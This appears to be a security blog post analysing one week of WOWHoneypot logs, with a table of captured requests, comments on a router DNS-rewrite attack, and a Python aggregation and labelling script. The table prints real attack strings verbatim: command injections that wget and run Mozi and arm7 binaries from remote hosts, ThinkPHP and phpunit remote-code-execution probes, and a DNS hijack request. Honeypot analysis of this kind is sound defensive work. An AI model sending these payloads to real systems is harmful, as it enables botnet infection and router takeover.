家studyをつづって (home study notes)

Notes on what I have learned about IT, security, guidelines and related topics.

WOWHoneypot log analysis (2020/05/23-2020/05/30)

Overview

This post summarizes the logs collected by the WOWHoneypot set up in an earlier article.

Period covered

2020/05/23-2020/05/30

Log summary

Source IP | Request | Detections
103.113.106.15 \"GET / 1
103.145.12.53 \"GET / 1
103.50.5.230 \"GET / 1
104.248.33.135 \"GET / 1
104.248.92.71 \"GET / 1
106.12.132.21 \"GET / 1
110.154.247.40 \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1
110.78.184.241 \"GET / 1
117.169.92.169 \"GET / 1
  \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
117.254.56.251 \"GET / 1
128.14.134.134 \"GET / 1
128.14.209.178 \"GET /login.html 1
134.175.45.127 \"GET / 1
  \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
134.19.215.196 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
136.243.208.164 \"GET / 1
  \"GET //Admin/scripts/setup.php 1
  \"GET //myadmin/scripts/setup.php 2
  \"GET //phpMyAdmin/scripts/setup.php 2
  \"GET //pma/scripts/setup.php 1
  \"GET /muieblackcat 1
139.162.119.197 \"GET / 1
156.96.155.242 \"GET / 1
  \"GET /admin/ 1
  \"GET /agSearch/SQlite/main.php 1
  \"GET /dbadmin/ 1
  \"GET /HNAP1/ 1
  \"GET /hudson/script 1
  \"GET /main.php 1
  \"GET /myadmin/ 1
  \"GET /mysql-admin/ 1
  \"GET /mysql/ 1
  \"GET /mysqladmin/ 1
  \"GET /mysqlmanager/ 1
  \"GET /openserver/phpmyadmin/ 1
  \"GET /p/m/a/ 1
  \"GET /php-my-admin/ 1
  \"GET /php-myadmin/ 1
  \"GET /phpmanager/ 1
  \"GET /phpmy-admin/ 1
  \"GET /phpMyAdmin-2.2.3/ 1
  \"GET /phpMyAdmin-2.2.6/ 1
  \"GET /phpMyAdmin-2.5.1/ 1
  \"GET /phpMyAdmin-2.5.4/ 1
  \"GET /phpMyAdmin-2.5.5-pl1/ 1
  \"GET /phpMyAdmin-2.5.5-rc1/ 1
  \"GET /phpMyAdmin-2.5.5-rc2/ 1
  \"GET /phpMyAdmin-2.5.5/ 1
  \"GET /phpMyAdmin-2.5.6-rc1/ 1
  \"GET /phpMyAdmin-2.5.6-rc2/ 1
  \"GET /phpMyAdmin-2.5.6/ 1
  \"GET /phpMyAdmin-2.5.7-pl1/ 1
  \"GET /phpMyAdmin-2.5.7/ 1
  \"GET /phpMyAdmin-2.6.0-alpha/ 1
  \"GET /phpMyAdmin-2.6.0-alpha2/ 1
  \"GET /phpMyAdmin-2.6.0-beta1/ 1
  \"GET /phpMyAdmin-2.6.0-beta2/ 1
  \"GET /phpMyAdmin-2.6.0-pl1/ 1
  \"GET /phpMyAdmin-2.6.0-pl2/ 1
  \"GET /phpMyAdmin-2.6.0-pl3/ 1
  \"GET /phpMyAdmin-2.6.0-rc1/ 1
  \"GET /phpMyAdmin-2.6.0-rc2/ 1
  \"GET /phpMyAdmin-2.6.0-rc3/ 1
  \"GET /phpMyAdmin-2.6.0/ 1
  \"GET /phpMyAdmin-2.6.1-pl1/ 1
  \"GET /phpMyAdmin-2.6.1-pl2/ 1
  \"GET /phpMyAdmin-2.6.1-pl3/ 1
  \"GET /phpMyAdmin-2.6.1-rc1/ 1
  \"GET /phpMyAdmin-2.6.1-rc2/ 1
  \"GET /phpMyAdmin-2.6.1/ 1
  \"GET /phpMyAdmin-2.6.2-beta1/ 1
  \"GET /phpMyAdmin-2.6.2-pl1/ 1
  \"GET /phpMyAdmin-2.6.2-rc1/ 2
  \"GET /phpMyAdmin-2.6.2/ 1
  \"GET /phpMyAdmin-2.6.3-pl1/ 1
  \"GET /phpMyAdmin-2.6.3-rc1/ 1
  \"GET /phpMyAdmin-2.6.3/ 2
  \"GET /phpMyAdmin-2.6.4-pl1/ 1
  \"GET /phpMyAdmin-2.6.4-pl2/ 1
  \"GET /phpMyAdmin-2.6.4-pl3/ 1
  \"GET /phpMyAdmin-2.6.4-pl4/ 1
  \"GET /phpMyAdmin-2.6.4-rc1/ 1
  \"GET /phpMyAdmin-2.6.4/ 1
  \"GET /phpMyAdmin-2.7.0-beta1/ 1
  \"GET /phpMyAdmin-2.7.0-pl1/ 1
  \"GET /phpMyAdmin-2.7.0-pl2/ 1
  \"GET /phpMyAdmin-2.7.0-rc1/ 1
  \"GET /phpMyAdmin-2.7.0/ 1
  \"GET /phpMyAdmin-2.8.0-beta1/ 1
  \"GET /phpMyAdmin-2.8.0-rc1/ 1
  \"GET /phpMyAdmin-2.8.0-rc2/ 1
  \"GET /phpMyAdmin-2.8.0.1/ 1
  \"GET /phpMyAdmin-2.8.0.2/ 1
  \"GET /phpMyAdmin-2.8.0.3/ 1
  \"GET /phpMyAdmin-2.8.0.4/ 1
  \"GET /phpMyAdmin-2.8.0/ 1
  \"GET /phpMyAdmin-2.8.1-rc1/ 1
  \"GET /phpMyAdmin-2.8.1/ 1
  \"GET /phpMyAdmin-2.8.2/ 1
  \"GET /phpMyAdmin-2/ 1
  \"GET /phpmyadmin/ 2
  \"GET /phpmyadmin2/ 2
  \"GET /PMA/ 2
  \"GET /PMA2005/ 2
  \"GET /script 1
  \"GET /sqlite/main.php 3
  \"GET /SQLiteManager-1.2.4/main.php 1
  \"GET /sqlitemanager/main.php 2
  \"GET /sqlmanager/ 1
  \"GET /sqlweb/ 1
  \"GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php 1
  \"GET /webadmin/ 1
  \"GET /webdb/ 1
  \"GET /websql/ 1
  \"GET http://www.msftncsi.com/ncsi.txt 1
162.243.136.45 \"GET /portal/redlion 1
162.243.143.101 \"GET / 1
162.243.143.168 \"GET /hudson 1
162.243.145.12 \"GET / 1
172.104.108.109 \"GET / 1
173.249.51.194 \"GET / 1
175.143.116.79 \"GET / 1
176.43.128.2 \"GET / 1
177.38.181.151 \"GET / 1
178.212.49.134 \"GET / 1
178.62.55.19 \"GET / 1
178.73.215.171 \"GET / 1
179.106.102.225 \"GET / 1
181.143.221.68 \"POST /cgi-bin/mainfunction.cgi 1
181.211.255.210 \"GET / 1
183.136.225.46 \"GET / 1
185.10.142.11 \"GET / 1
185.140.160.220 \"GET / 1
185.141.110.143 \"GET / 1
185.156.73.64 \"GET / 2
185.181.52.204 \"GET / 1
185.198.1.105 \"GET / 1
185.216.140.6 \"GET / 1
185.234.219.133 \"GET / 1
185.82.127.47 \"GET / 1
185.82.215.92 \"GET / 1
187.122.189.163 \"GET / 1
187.150.69.49 \"GET / 1
189.113.189.58 \"GET / 1
189.126.64.162 \"GET / 1
189.14.13.52 \"GET / 1
190.94.136.219 \"GET / 1
190.94.148.238 \"GET / 1
190.94.192.8 \"POST /cgi-bin/mainfunction.cgi 1
190.98.213.242 \"GET / 1
191.103.253.25 \"GET / 1
192.227.223.22 \"GET / 1
  \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
  \"POST /TP/public/index.php?s=captcha 1
193.118.53.202 \"GET / 1
193.118.53.210 \"GET / 1
194.156.108.13 \"GET / 1
194.208.56.93 \"GET / 1
195.154.94.244 \"GET / 7
195.54.160.123 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 2
  \"GET /?XDEBUG_SESSION_START=phpstorm 2
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 2
  \"GET /solr/admin/info/system?wt=json 2
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
  \"POST /api/jsonws/invoke 2
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
195.54.160.130 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 5
  \"GET /?XDEBUG_SESSION_START=phpstorm 5
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 5
  \"GET /solr/admin/info/system?wt=json 5
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
  \"POST /api/jsonws/invoke 5
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1
196.46.187.14 \"GET / 1
196.52.43.117 \"GET / 1
196.52.43.63 \"GET / 1
196.52.43.98 \"GET / 1
198.108.66.202 \"GET / 1
198.108.66.246 \"GET / 1
198.162.202.253 \"GET / 1
198.199.73.101 \"GET /admin/connection/ 1
  \"GET /favicon.ico 1
200.141.135.218 \"GET / 1
201.171.46.39 \"POST /cgi-bin/mainfunction.cgi 1
201.76.114.32 \"GET / 1
202.51.180.250 \"GET / 1
207.148.15.205 \"GET / 1
209.17.96.122 \"GET / 1
209.17.96.138 \"GET / 1
209.17.96.194 \"GET / 1
209.17.96.210 \"GET / 1
209.17.96.58 \"GET / 1
209.17.96.82 \"GET / 2
209.17.97.114 \"GET / 1
209.17.97.2 \"GET / 1
209.97.190.223 \"GET / 1
212.125.26.105 \"GET / 1
212.200.108.225 \"GET / 1
212.90.181.254 \"GET / 1
213.109.235.252 \"GET / 1
213.153.167.87 \"GET / 1
220.248.49.230 \"GET /TP/public/index.php 1
222.10.33.175 \"GET /operator/basic.shtml?id=1337 1
  \"GET /sess-bin/login_session.cgi 2
  \"GET /setup.cgi 1
  \"GET /shell?/bin/busybox+ABCD 2
  \"POST /doLogin 1
23.31.209.205 \"POST /cgi-bin/mainfunction.cgi 1
34.76.17.151 \"GET / 1
35.196.251.88 \"GET /bc9615d267dba809638d9fbc9eb55236.php 1
  \"GET /D90A75ABEFF190F2A31DA59546864E43.php 1
  \"GET /dbf772166781764452a2d50883ed1d63.php 1
  \"GET /phpmyadmin/index.php 2
37.119.104.59 \"GET /adv 1
39.104.130.149 \"GET / 2
  \"GET //navigation.html 1
  \"GET /Css/Pictures/Login/LoginContent.png 1
  \"GET /image/lgbg.jpg 1
  \"GET /images/login/login_01.jpg 1
  \"GET /images/logo.png 1
  \"GET /info/SYSTEM/_Application.htm 2
  \"GET /server.js 1
39.104.142.189 \"POST /onvif/device_service 1
47.89.192.12 \"GET / 1
47.96.114.93 \"GET /TP/public/index.php 1
  \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 1
5.101.0.209 \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 3
  \"GET /?XDEBUG_SESSION_START=phpstorm 3
  \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP 3
  \"GET /solr/admin/info/system?wt=json 3
  \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 3
  \"POST /api/jsonws/invoke 3
  \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 3
5.32.176.117 \"GET / 1
5.58.14.24 \"GET / 1
51.159.71.63 \"GET / 2
  \"GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1 1
51.254.59.113 \"GET / 1
52.232.188.182 \"GET / 1
54.173.153.105 \"GET / 1
59.8.227.74 \"GET / 3
61.70.132.192 \"GET / 2
62.5.156.153 \"GET / 1
71.6.232.4 \"GET / 1
77.57.58.179 \"GET / 1
78.187.193.68 \"GET / 1
80.80.150.41 \"GET / 1
80.82.68.60 \"GET / 1
  \"GET /favicon.ico 1
  \"GET /robots.txt 1
80.82.70.118 \"GET / 2
81.211.44.50 \"GET / 1
82.55.240.23 \"GET /adv 1
82.62.97.143 \"GET / 5
89.168.181.138 \"GET / 1
89.218.249.86 \"GET / 1
89.240.158.102 \"GET / 1
89.36.211.92 \"GET / 1
91.222.108.56 \"GET / 1
91.232.157.226 \"GET / 1
91.236.177.162 \"GET / 2
92.118.161.21 \"GET / 1
94.242.57.16 \"HEAD / 1
95.5.252.227 \"GET / 1

Comments

  • "GET /manager/html" was not detected in this period (784 times in the previous period).
  • An attack aimed at rewriting the DNS server settings of home routers was observed:
    \"GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1

    The DNS server address in that request (111.90.159.53) has also been reported as malicious on VirusTotal.

    Related links: www.virustotal.com, securelist.com
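As an added example (not the blog's own aggregation script, nor code from the WOWHoneypot project), the Python below reproduces the two steps this post performs by hand: building the source IP x request count table from WOWHoneypot access-log lines, and then rolling this period's requests up into defender-side labels (the router DNS rewrite and the ThinkPHP invokefunction probes noted in the comments) and diffing the period against a previous one, which is how a note like "GET /manager/html: 784 before, 0 now" is produced. The access-log line layout, the RFC 5737 sample addresses, the label names and the previous-period counter are assumptions or constructed data; the request paths come from the table above.

```python
"""Aggregate WOWHoneypot-style access-log lines into a source x request table,
label request shapes, and compare two periods.

Added example, not the blog author's script.  ASSUMPTION: each access_log line
has the layout
  [timestamp] src_ip:src_port dst_ip:dst_port match_id "request line" base64_body
If your WOWHoneypot build writes a different layout, adjust LINE_RE only.
"""
import re
from collections import Counter
from urllib.parse import unquote

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\]\s+'
    r'(?P<src>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+'
    r'(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+'
    r'(?P<match>\d+)\s+'
    r'"(?P<req>[^"]*)"'
)

# Defender-side labels (names are our own) for request shapes seen in the table.
# Checked against the URL-decoded path; the first match wins.
TAGS = [
    ("router-dns-rewrite", re.compile(r"/dnscfg\.cgi\?.*dnsPrimary=", re.I)),
    ("thinkphp-invokefunction", re.compile(r"invokefunction&function=call_user_func_array", re.I)),
    ("command-injection", re.compile(r"^/shell\?|mainfunction\.cgi\?action=login", re.I)),
    ("db-admin-scan", re.compile(r"/(phpmyadmin|pma|myadmin|sqlite)", re.I)),
]

# Constructed sample records (RFC 5737 addresses, placeholder base64 bodies);
# the paths are copied from the table above.  The last line is deliberately junk.
SAMPLE_LOG = r"""
[2020-05-23 01:02:03+0900] 203.0.113.10:51234 192.0.2.5:80 0 "GET / HTTP/1.1" R0VUIC8=
[2020-05-23 01:02:04+0900] 203.0.113.10:51235 192.0.2.5:80 0 "GET / HTTP/1.1" R0VUIC8=
[2020-05-24 11:22:33+0900] 203.0.113.20:40000 192.0.2.5:80 1 "GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" R0VUIC8=
[2020-05-25 09:00:00+0900] 203.0.113.30:33333 192.0.2.5:80 1 "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1" R0VUIC8=
[2020-05-25 09:00:01+0900] 203.0.113.30:33334 192.0.2.5:80 1 "POST /TP/public/index.php?s=captcha HTTP/1.1" UE9TVA==
[2020-05-26 18:00:00+0900] 203.0.113.40:2222 192.0.2.5:80 1 "GET /phpMyAdmin-2.8.2/ HTTP/1.1" R0VUIC8=
this line is not an access-log record and must be skipped
""".strip().splitlines()


def parse_line(line):
    """Return (src_ip, match_id, 'METHOD /path') or None for an unparsable line."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    parts = m.group("req").split(" ")
    path = parts[1] if len(parts) > 1 else ""
    return m.group("src"), int(m.group("match")), f"{parts[0]} {path}"


def tag_request(request):
    """Label a 'METHOD /path' string; decode %xx first so encoding does not hide the shape."""
    path = unquote(request.split(" ", 1)[1]) if " " in request else ""
    for name, rx in TAGS:
        if rx.search(path):
            return name
    return "other"


def aggregate(lines):
    """Count (source IP, request) pairs: the shape of the table in this post."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            src, _match_id, request = rec
            counts[(src, request)] += 1
    return counts


def render_table(counts):
    """Plain-text listing sorted lexically by IP, as the page's table is."""
    rows = ["source\trequest\tcount"]
    rows += [f"{src}\t{req}\t{n}" for (src, req), n in sorted(counts.items())]
    return "\n".join(rows)


def per_request(counts):
    """Collapse (source, request) counts into per-request totals."""
    totals = Counter()
    for (_src, request), n in counts.items():
        totals[request] += n
    return totals


def tag_counts(counts):
    """Roll per-request totals up into the defender-side labels."""
    out = Counter()
    for request, n in per_request(counts).items():
        out[tag_request(request)] += n
    return out


def compare_periods(previous, current):
    """{request: (previous_total, current_total)} for every request whose total changed."""
    prev, cur = per_request(previous), per_request(current)
    return {r: (prev[r], cur[r]) for r in set(prev) | set(cur) if prev[r] != cur[r]}


if __name__ == "__main__":
    counts = aggregate(SAMPLE_LOG)
    print(render_table(counts))
    print(dict(tag_counts(counts)))
    # Constructed previous period containing the Tomcat manager probe that the
    # comments say disappeared in this one.
    previous = Counter({("203.0.113.99", "GET /manager/html"): 784})
    print(compare_periods(previous, counts))
```

Feed the real access_log through `aggregate` instead of `SAMPLE_LOG` to get this post's table; `tag_counts` gives the per-label totals that make a week-over-week comparison readable, and `compare_periods` is what turns two weeks of counters into the kind of observation made in the comments.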